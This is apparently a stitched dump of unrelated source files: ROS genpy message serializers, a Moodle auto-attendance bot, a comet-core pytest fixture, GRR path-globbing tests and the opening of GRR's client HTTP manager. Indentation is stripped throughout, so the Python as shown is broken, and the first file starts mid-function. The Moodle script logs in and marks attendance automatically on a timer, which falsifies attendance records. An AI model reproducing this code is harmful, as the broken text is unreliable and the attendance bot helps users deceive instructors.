if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_3B.pack(_x.pin, _x.value, _x.rate))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
_x = self
start = end
end += 3
(_x.pin, _x.value, _x.rate,) = _struct_3B.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_3B.pack(_x.pin, _x.value, _x.rate))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
_x = self
start = end
end += 3
(_x.pin, _x.value, _x.rate,) = _struct_3B.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3B = struct.Struct("<3B")
"""autogenerated by genpy from arbotix_msgs/SetupChannelResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SetupChannelResponse(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "arbotix_msgs/SetupChannelResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SetupChannelResponse, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
class SetupChannel(object):
_type = 'arbotix_msgs/SetupChannel'
_md5sum = 'c65e58d8b3b4d406126f6dc829a6011f'
_request_class = SetupChannelRequest
_response_class = SetupChannelResponse
``` |
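As a quick illustration of the generated (de)serialization above, this hedged sketch round-trips a request through an in-memory buffer; the field values are arbitrary examples.

```python
from io import BytesIO

req = SetupChannelRequest(topic_name='pan_servo', pin=3, value=128, rate=25)
buff = BytesIO()
req.serialize(buff)  # length-prefixed topic name followed by the three packed bytes

decoded = SetupChannelRequest()
decoded.deserialize(buff.getvalue())
assert (decoded.topic_name, decoded.pin, decoded.value, decoded.rate) == ('pan_servo', 3, 128, 25)
```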
{
"source": "4ndu-7h4k/MoodleAutoAttedence",
"score": 3
} |
#### File: MoodleAutoAttedence/moodle/__main__.py
```python
from moodle import log, ENDC, GREEN, WARNING, START_TIME, END_TIME, CYAN, RED
from urllib.parse import urlparse, parse_qs
from moodle.attendence import attendence
from moodle.telegrambot import send
from bs4 import BeautifulSoup
from datetime import datetime
from pytz import timezone
import schedule, time
import requests
format = "%I:%M:%S"
def banner():
"""
Banner
"""
print(
f"{CYAN} ██████ ██████ █████ ████ \n \
░░██████ ██████ ░░███ ░░███ \n \
░███░█████░███ ██████ ██████ ███████ ░███ ██████ \n \
░███░░███ ░███ ███░░███ ███░░███ ███░░███ ░███ ███░░███\n \
░███ ░░░ ░███ ░███ ░███░███ ░███░███ ░███ ░███ ░███████ \n \
░███ ░███ ░███ ░███░███ ░███░███ ░███ ░███ ░███░░░ \n \
█████ █████░░██████ ░░██████ ░░████████ █████░░██████ \n \
░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░░░░ ░░░░░ ░░░░░░ {ENDC}"
)
def loophour():
schedule.every(30).minutes.until(END_TIME).do(check)
def check():
now_utc = datetime.now(timezone("UTC"))
now_asia = now_utc.astimezone(timezone("Asia/Kolkata"))
log.info(
f"{WARNING}{now_asia.strftime(format)} : Attendence checking for all Courses{ENDC}\n\n"
)
k = 1
while k <= 4:
for name, url in m.set_course_list(m.get_course()).items():
m.mark_attedence(m.get_attendence_url(url)[0], name)
if m.tcount == m.tcourse:
k += 1
m.tcount = 0
now_utc = datetime.now(timezone("UTC"))
now_asia = now_utc.astimezone(timezone("Asia/Kolkata"))
log.info(
f"{now_asia.strftime(format)} : All classes don't have attendence now!"
)
if k == 4:
send("No classes found now , please check manually")
break
log.info(f"Waiting,{3*k} minutes to check again\n\n")
time.sleep(180)
log.info(f"Checking attendence again, after {3*k} minutes")
else:
m.tcount = 0
break
if __name__ == "__main__":
banner()
m = attendence()
if m.login():
log.info(f"{GREEN}Moodle Session Started{ENDC}")
else:
log.error(f"{RED}Unable to login check the credential, or sever is down{ENDC}")
exit()
log.info(f"Attedence checking for all course ")
if not schedule.get_jobs():
try:
log.debug(schedule.every(30).minutes.until(END_TIME).do(check))
except Exception:
log.error("30 minute scheduler stoped, no class after 3.30")
log.debug(schedule.every().monday.at(START_TIME).do(loophour))
log.debug(schedule.every().tuesday.at(START_TIME).do(loophour))
log.debug(schedule.every().wednesday.at(START_TIME).do(loophour))
log.debug(schedule.every().thursday.at(START_TIME).do(loophour))
log.debug(schedule.every().friday.at(START_TIME).do(loophour))
check()
while True:
schedule.run_pending()
time.sleep(1)
``` |
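The scheduling pattern used above boils down to registering a recurring job with an end time and then polling for pending jobs once per second. A stripped-down, self-contained sketch follows; the job body and times are placeholders, not part of the project.

```python
import time

import schedule

def job():
    print("checking attendance")

# Run every 30 minutes until 15:30, mirroring the every(30).minutes.until(...) calls above.
schedule.every(30).minutes.until("15:30").do(job)

while True:
    schedule.run_pending()
    time.sleep(1)
```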
{
"source": "4ndygu/comet-core",
"score": 2
} |
#### File: comet-core/tests/conftest.py
```python
import os
from comet_core import Comet
import pytest
@pytest.fixture
def app():
yield Comet()
@pytest.fixture
def test_db():
"""Setup a test database fixture
Yields:
DataStore: a sqlite backed datastore with all test data
"""
from comet_core.data_store import DataStore
from tests.utils import get_all_test_messages
data_store = DataStore('sqlite://')
for event in get_all_test_messages(parsed=True):
data_store.add_record(event.get_record())
yield data_store
``` |
{
"source": "4ndygu/grr",
"score": 2
} |
#### File: client_actions/file_finder_utils/globbing_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
import shutil
import unittest
from absl.testing import absltest
from builtins import zip # pylint: disable=redefined-builtin
from grr_response_client.client_actions.file_finder_utils import globbing
from grr_response_core.lib import flags
from grr_response_core.lib.util import temp
from grr.test_lib import test_lib
# TODO(hanuszczak): Consider refactoring these tests with `pyfakefs`.
class DirHierarchyTestMixin(object):
def setUp(self):
super(DirHierarchyTestMixin, self).setUp()
self.tempdir = temp.TempDirPath()
def tearDown(self):
super(DirHierarchyTestMixin, self).tearDown()
shutil.rmtree(self.tempdir)
def Path(self, *components):
return os.path.join(self.tempdir, *components)
def Touch(self, *components):
filepath = self.Path(*components)
dirpath = os.path.dirname(filepath)
try:
if not os.path.exists(dirpath):
os.makedirs(dirpath)
with io.open(filepath, "a"):
pass
except UnicodeEncodeError:
# TODO(hanuszczak): Make sure that Python 3 also throws the same error
# in case of unsupported unicodes in the filesystem. In general this
# exception being thrown feels very fishy.
raise unittest.SkipTest("Unicode not supported by the filesystem")
class RecursiveComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testSimple(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("baz", "0")
self.Touch("baz", "1")
component = globbing.RecursiveComponent()
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "bar", "0"),
self.Path("baz"),
self.Path("baz", "0"),
self.Path("baz", "1"),
])
results = list(component.Generate(self.Path("foo")))
self.assertCountEqual(results, [
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "bar", "0"),
])
results = list(component.Generate(self.Path("baz")))
self.assertCountEqual(results, [
self.Path("baz", "0"),
self.Path("baz", "1"),
])
results = list(component.Generate(self.Path("foo", "bar")))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
])
def testMaxDepth(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "baz", "0")
component = globbing.RecursiveComponent(max_depth=3)
results = list(component.Generate(self.Path()))
# Files at level lesser than 3 should be included.
self.assertIn(self.Path("foo"), results)
self.assertIn(self.Path("foo", "0"), results)
self.assertIn(self.Path("foo", "1"), results)
self.assertIn(self.Path("foo", "bar"), results)
# Files at level equal to 3 should be included.
self.assertIn(self.Path("foo", "bar", "0"), results)
self.assertIn(self.Path("foo", "bar", "baz"), results)
# Files at level bigger that 3 should not be included.
self.assertNotIn(self.Path("foo", "bar", "baz", "0"), results)
def testIgnore(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("bar", "0")
self.Touch("bar", "quux", "0")
self.Touch("bar", "quux", "1")
self.Touch("baz", "0")
self.Touch("baz", "1")
self.Touch("baz", "quux", "0")
opts = globbing.PathOpts(recursion_blacklist=[
self.Path("foo"),
self.Path("bar", "quux"),
])
component = globbing.RecursiveComponent(opts=opts)
results = list(component.Generate(self.Path()))
# Recursion should not visit into the blacklisted folders.
self.assertNotIn(self.Path("foo", "0"), results)
self.assertNotIn(self.Path("foo", "1"), results)
self.assertNotIn(self.Path("bar", "quux", "0"), results)
self.assertNotIn(self.Path("bar", "quux", "1"), results)
# Blacklisted folders themselves should appear in the results.
self.assertIn(self.Path("foo"), results)
self.assertIn(self.Path("bar", "quux"), results)
# Recursion should visit not blacklisted folders.
self.assertIn(self.Path("baz"), results)
self.assertIn(self.Path("baz", "0"), results)
self.assertIn(self.Path("baz", "1"), results)
self.assertIn(self.Path("baz", "quux"), results)
self.assertIn(self.Path("baz", "quux", "0"), results)
def testFollowLinks(self):
self.Touch("foo", "0")
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "0")
self.Touch("foo", "baz", "1")
self.Touch("quux", "0")
self.Touch("norf", "0")
os.symlink(self.Path("foo", "bar"), self.Path("quux", "bar"))
os.symlink(self.Path("foo", "baz"), self.Path("quux", "baz"))
os.symlink(self.Path("quux"), self.Path("norf", "quux"))
opts = globbing.PathOpts(follow_links=True)
component = globbing.RecursiveComponent(opts=opts)
# It should resolve two links and recur to linked directories.
results = list(component.Generate(self.Path("quux")))
self.assertCountEqual(results, [
self.Path("quux", "0"),
self.Path("quux", "bar"),
self.Path("quux", "bar", "0"),
self.Path("quux", "baz"),
self.Path("quux", "baz", "0"),
self.Path("quux", "baz", "1"),
])
# It should resolve symlinks recursively.
results = list(component.Generate(self.Path("norf")))
self.assertCountEqual(results, [
self.Path("norf", "0"),
self.Path("norf", "quux"),
self.Path("norf", "quux", "0"),
self.Path("norf", "quux", "bar"),
self.Path("norf", "quux", "bar", "0"),
self.Path("norf", "quux", "baz"),
self.Path("norf", "quux", "baz", "0"),
self.Path("norf", "quux", "baz", "1"),
])
opts = globbing.PathOpts(follow_links=False)
component = globbing.RecursiveComponent(opts=opts)
# It should list symlinks but should not recur to linked directories.
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("foo", "0"),
self.Path("foo", "bar"),
self.Path("foo", "bar", "0"),
self.Path("foo", "baz"),
self.Path("foo", "baz", "0"),
self.Path("foo", "baz", "1"),
self.Path("quux"),
self.Path("quux", "0"),
self.Path("quux", "bar"),
self.Path("quux", "baz"),
self.Path("norf"),
self.Path("norf", "0"),
self.Path("norf", "quux"),
])
def testInvalidDirpath(self):
component = globbing.RecursiveComponent()
results = list(component.Generate("/foo/bar/baz"))
self.assertCountEqual(results, [])
class GlobComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testLiterals(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
component = globbing.GlobComponent("foo")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
])
component = globbing.GlobComponent("bar")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("bar"),
])
def testStar(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
self.Touch("quux")
component = globbing.GlobComponent("*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
self.Path("baz"),
self.Path("quux"),
])
component = globbing.GlobComponent("ba*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("bar"),
self.Path("baz"),
])
def testQuestionmark(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
self.Touch("barg")
component = globbing.GlobComponent("ba?")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("bar"),
self.Path("baz"),
])
def testSimpleClass(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
self.Touch("baf")
component = globbing.GlobComponent("ba[rz]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("baz"),
self.Path("bar"),
])
def testRangeClass(self):
self.Touch("foo")
self.Touch("8AR")
self.Touch("bar")
self.Touch("4815162342")
self.Touch("quux42")
component = globbing.GlobComponent("[a-z]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
self.Path("quux42"),
])
component = globbing.GlobComponent("[0-9]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("8AR"),
self.Path("4815162342"),
])
component = globbing.GlobComponent("*[0-9]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("4815162342"),
self.Path("quux42"),
])
def testMultiRangeClass(self):
self.Touch("f00")
self.Touch("b4R")
self.Touch("8az")
self.Touch("quux")
component = globbing.GlobComponent("[a-z][a-z0-9]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("f00"),
self.Path("b4R"),
self.Path("quux"),
])
def testComplementationClass(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("123")
component = globbing.GlobComponent("*[!0-9]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
])
def testCornerCases(self):
self.Touch("[")
self.Touch("-")
self.Touch("]")
self.Touch("!")
self.Touch("*")
self.Touch("?")
self.Touch("foo")
component = globbing.GlobComponent("[][-]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("["),
self.Path("-"),
self.Path("]"),
])
component = globbing.GlobComponent("[!]f-]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("["),
self.Path("*"),
self.Path("!"),
self.Path("?"),
])
component = globbing.GlobComponent("[*?]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("*"),
self.Path("?"),
])
def testWhitespace(self):
self.Touch("foo bar")
self.Touch(" ")
self.Touch("quux")
component = globbing.GlobComponent("* *")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo bar"),
self.Path(" "),
])
def testCaseInsensivity(self):
self.Touch("foo")
self.Touch("BAR")
self.Touch("BaZ")
self.Touch("qUuX")
component = globbing.GlobComponent("b*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("BAR"),
self.Path("BaZ"),
])
component = globbing.GlobComponent("quux")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("qUuX"),
])
component = globbing.GlobComponent("FoO")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
])
def testUnicodeGlobbing(self):
self.Touch("ścieżka")
self.Touch("dróżka")
results = list(globbing.GlobComponent("ścieżka").Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("ścieżka"),
])
results = list(globbing.GlobComponent("dróżka").Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("dróżka"),
])
results = list(globbing.GlobComponent("*żka").Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("ścieżka"),
self.Path("dróżka"),
])
def testUnicodeSubfolderGlobbing(self):
self.Touch("zbiór", "podścieżka")
self.Touch("zbiór", "poddróżka")
results = list(globbing.GlobComponent("*").Generate(self.Path("zbiór")))
self.assertCountEqual(results, [
self.Path("zbiór", "podścieżka"),
self.Path("zbiór", "poddróżka"),
])
class CurrentComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testSimple(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "0")
component = globbing.CurrentComponent()
results = list(component.Generate(self.Path("foo")))
self.assertCountEqual(results, [self.Path("foo")])
results = list(component.Generate(self.Path("foo", "bar")))
self.assertCountEqual(results, [self.Path("foo", "bar")])
results = list(component.Generate(self.Path("foo", "baz")))
self.assertCountEqual(results, [self.Path("foo", "baz")])
class ParentComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testSimple(self):
self.Touch("foo", "0")
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "baz", "0")
component = globbing.ParentComponent()
results = list(component.Generate(self.Path("foo")))
self.assertCountEqual(results, [self.Path()])
results = list(component.Generate(self.Path("foo", "bar")))
self.assertCountEqual(results, [self.Path("foo")])
results = list(component.Generate(self.Path("foo", "bar", "baz")))
self.assertCountEqual(results, [self.Path("foo", "bar")])
class ParsePathItemTest(absltest.TestCase):
def testRecursive(self):
component = globbing.ParsePathItem("**")
self.assertIsInstance(component, globbing.RecursiveComponent)
self.assertEqual(component.max_depth, 3)
def testRecursiveWithDepth(self):
component = globbing.ParsePathItem("**42")
self.assertIsInstance(component, globbing.RecursiveComponent)
self.assertEqual(component.max_depth, 42)
def testGlob(self):
component = globbing.ParsePathItem("foo*")
self.assertIsInstance(component, globbing.GlobComponent)
component = globbing.ParsePathItem("*")
self.assertIsInstance(component, globbing.GlobComponent)
component = globbing.ParsePathItem("foo ba?")
self.assertIsInstance(component, globbing.GlobComponent)
def testCurrent(self):
component = globbing.ParsePathItem(os.path.curdir)
self.assertIsInstance(component, globbing.CurrentComponent)
def testParent(self):
component = globbing.ParsePathItem(os.path.pardir)
self.assertIsInstance(component, globbing.ParentComponent)
def testMalformed(self):
with self.assertRaises(ValueError):
globbing.ParsePathItem("foo**")
with self.assertRaises(ValueError):
globbing.ParsePathItem("**10bar")
class ParsePathTest(absltest.TestCase):
def assertAreInstances(self, instances, classes):
for instance, clazz in zip(instances, classes):
self.assertIsInstance(instance, clazz)
self.assertLen(instances, len(classes))
def testSimple(self):
path = os.path.join("foo", "**", "ba*")
components = list(globbing.ParsePath(path))
self.assertAreInstances(components, [
globbing.GlobComponent,
globbing.RecursiveComponent,
globbing.GlobComponent,
])
path = os.path.join("foo", os.path.curdir, "bar", "baz", os.path.pardir)
components = list(globbing.ParsePath(path))
self.assertAreInstances(components, [
globbing.GlobComponent,
globbing.CurrentComponent,
globbing.GlobComponent,
globbing.GlobComponent,
globbing.ParentComponent,
])
def testMultiRecursive(self):
path = os.path.join("foo", "**", "bar", "**", "baz")
with self.assertRaises(ValueError):
list(globbing.ParsePath(path))
class ExpandGroupsTest(absltest.TestCase):
def testSimple(self):
path = "fooba{r,z}"
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, [
"foobar",
"foobaz",
])
def testMultiple(self):
path = os.path.join("f{o,0}o{bar,baz}", "{quux,norf}")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, [
os.path.join("foobar", "quux"),
os.path.join("foobar", "norf"),
os.path.join("foobaz", "quux"),
os.path.join("foobaz", "norf"),
os.path.join("f0obar", "quux"),
os.path.join("f0obar", "norf"),
os.path.join("f0obaz", "quux"),
os.path.join("f0obaz", "norf"),
])
def testMany(self):
path = os.path.join("foo{bar,baz,quux,norf}thud")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, [
os.path.join("foobarthud"),
os.path.join("foobazthud"),
os.path.join("fooquuxthud"),
os.path.join("foonorfthud"),
])
def testEmpty(self):
path = os.path.join("foo{}bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo{}bar"])
def testSingleton(self):
path = os.path.join("foo{bar}baz")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo{bar}baz"])
def testUnclosed(self):
path = os.path.join("foo{bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo{bar"])
path = os.path.join("foo}bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo}bar"])
def testEscaped(self):
path = os.path.join("foo\\{baz}bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo\\{baz}bar"])
def testNoGroup(self):
path = os.path.join("foobarbaz")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foobarbaz"])
class ExpandGlobsTest(DirHierarchyTestMixin, absltest.TestCase):
def testWildcards(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "1")
self.Touch("foo", "norf", "0")
self.Touch("quux", "bar", "0")
self.Touch("quux", "baz", "0")
self.Touch("quux", "norf", "0")
path = self.Path("*", "ba?", "0")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("quux", "bar", "0"),
self.Path("quux", "baz", "0"),
])
def testRecursion(self):
self.Touch("foo", "bar", "baz", "0")
self.Touch("foo", "bar", "0")
self.Touch("foo", "quux", "0")
self.Touch("foo", "quux", "1")
path = self.Path("foo", "**", "0")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "baz", "0"),
self.Path("foo", "bar", "0"),
self.Path("foo", "quux", "0"),
])
def testMixed(self):
self.Touch("foo", "bar", "0")
self.Touch("norf", "bar", "0")
self.Touch("norf", "baz", "0")
self.Touch("norf", "baz", "1")
self.Touch("norf", "baz", "7")
self.Touch("quux", "bar", "0")
self.Touch("quux", "baz", "1")
self.Touch("quux", "baz", "2")
path = self.Path("**", "ba?", "[0-2]")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("norf", "bar", "0"),
self.Path("norf", "baz", "0"),
self.Path("norf", "baz", "1"),
self.Path("quux", "bar", "0"),
self.Path("quux", "baz", "1"),
self.Path("quux", "baz", "2"),
])
def testEmpty(self):
with self.assertRaises(ValueError):
list(globbing.ExpandGlobs(""))
def testRelative(self):
with self.assertRaises(ValueError):
list(globbing.ExpandGlobs(os.path.join("foo", "bar")))
def testCurrent(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "1")
self.Touch("quux", "bar", "0")
path = self.Path("foo", os.path.curdir, "bar", "*")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("foo", "bar", "1"),
])
path = self.Path(os.path.curdir, "*", "bar", "0")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("quux", "bar", "0"),
])
def testParent(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("bar", "0")
path = self.Path("foo", "*")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
])
path = self.Path("foo", os.path.pardir, "*")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
])
class ExpandPathTest(DirHierarchyTestMixin, absltest.TestCase):
def testGlobAndGroup(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "1")
self.Touch("foo", "baz", "0")
self.Touch("foo", "baz", "1")
self.Touch("foo", "quux", "0")
self.Touch("foo", "quux", "1")
path = self.Path("foo/ba{r,z}/*")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("foo", "bar", "1"),
self.Path("foo", "baz", "0"),
self.Path("foo", "baz", "1"),
])
path = self.Path("foo/ba*/{0,1}")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("foo", "bar", "1"),
self.Path("foo", "baz", "0"),
self.Path("foo", "baz", "1"),
])
def testRecursiveAndGroup(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "quux", "0")
path = self.Path("foo/**")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "baz"),
self.Path("foo", "bar", "0"),
self.Path("foo", "baz", "quux"),
self.Path("foo", "baz", "quux", "0"),
])
path = self.Path("foo/{.,**}")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "baz"),
self.Path("foo", "bar", "0"),
self.Path("foo", "baz", "quux"),
self.Path("foo", "baz", "quux", "0"),
])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: client/grr_response_client/comms.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
import logging
import os
import pdb
import posixpath
import signal
import sys
import threading
import time
import traceback
from builtins import range # pylint: disable=redefined-builtin
import psutil
import queue
import requests
from grr_response_client import actions
from grr_response_client import client_stats
from grr_response_client import client_utils
from grr_response_client.client_actions import admin
from grr_response_core import config
from grr_response_core.lib import communicator
from grr_response_core.lib import flags
from grr_response_core.lib import queues
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import type_info
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_core.stats import stats_collector_instance
class HTTPObject(object):
"""Data returned from a HTTP connection."""
def __init__(self, url="", data="", proxy="", code=500, duration=0):
self.url = url
self.data = data
self.proxy = proxy
self.code = code
# Contains the decoded data from the 'control' endpoint.
self.messages = self.source = self.nonce = None
self.duration = duration
def Success(self):
"""Returns if the request was successful."""
return self.code in (200, 406)
class HTTPManager(object):
"""A manager for all HTTP/S connections.
NOTE: This HTTPManager is not thread safe and should not be shared between
threads.
"""
# If the client encounters this many connection errors, it searches
# for a new proxy/server url combination.
retry_error_limit = 10
# If the client encounters this many connection errors, it exits and
# restarts. Retries are one minute apart.
connection_error_limit = 60 * 24
def __init__(self, heart_beat_cb=None):
self.heart_beat_cb = heart_beat_cb
self.proxies = self._GetProxies()
self.base_urls = self._GetBaseURLs()
# We start checking with this proxy.
self.last_proxy_index = 0
self.last_base_url_index = 0
# If we have connected previously but now suddenly fail to connect, we try
# the connection a few times (retry_error_limit) before we determine
# that it is failed.
self.consecutive_connection_errors = 0
self.active_base_url = None
self.error_poll_min = config.CONFIG["Client.error_poll_min"]
def _GetBaseURLs(self):
"""Gathers a list of base URLs we will try."""
result = config.CONFIG["Client.server_urls"]
if not result:
# Backwards compatibility - deduce server_urls from Client.control_urls.
for control_url in config.CONFIG["Client.control_urls"]:
result.append(posixpath.dirname(control_url) + "/")
# Check the URLs for trailing /. This traps configuration errors.
for url in result:
if not url.endswith("/"):
raise RuntimeError("Bad URL: %s URLs must end with /" % url)
return result
def _GetProxies(self):
"""Gather a list of proxies to use."""
# Detect proxies from the OS environment.
result = client_utils.FindProxies()
# Also try to connect directly if all proxies fail.
result.append("")
# Also try all proxies configured in the config system.
result.extend(config.CONFIG["Client.proxy_servers"])
return result
